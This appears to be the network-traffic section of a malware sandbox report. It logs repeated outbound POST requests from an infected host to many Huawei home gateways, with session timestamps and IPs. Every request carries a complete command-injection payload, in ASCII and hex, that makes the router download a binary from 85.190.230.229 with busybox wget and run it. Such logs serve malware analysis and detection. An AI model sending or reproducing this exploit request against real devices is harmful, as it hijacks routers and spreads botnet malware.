                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.482212067 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.474065065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.458147049 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425796032 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361715078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.233006954 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999505997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      72192.168.2.1447884197.72.237.2137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.644150019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.986100912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      73192.168.2.145255041.132.99.6737215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.645379066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      74192.168.2.1451524102.89.186.14337215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.650237083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 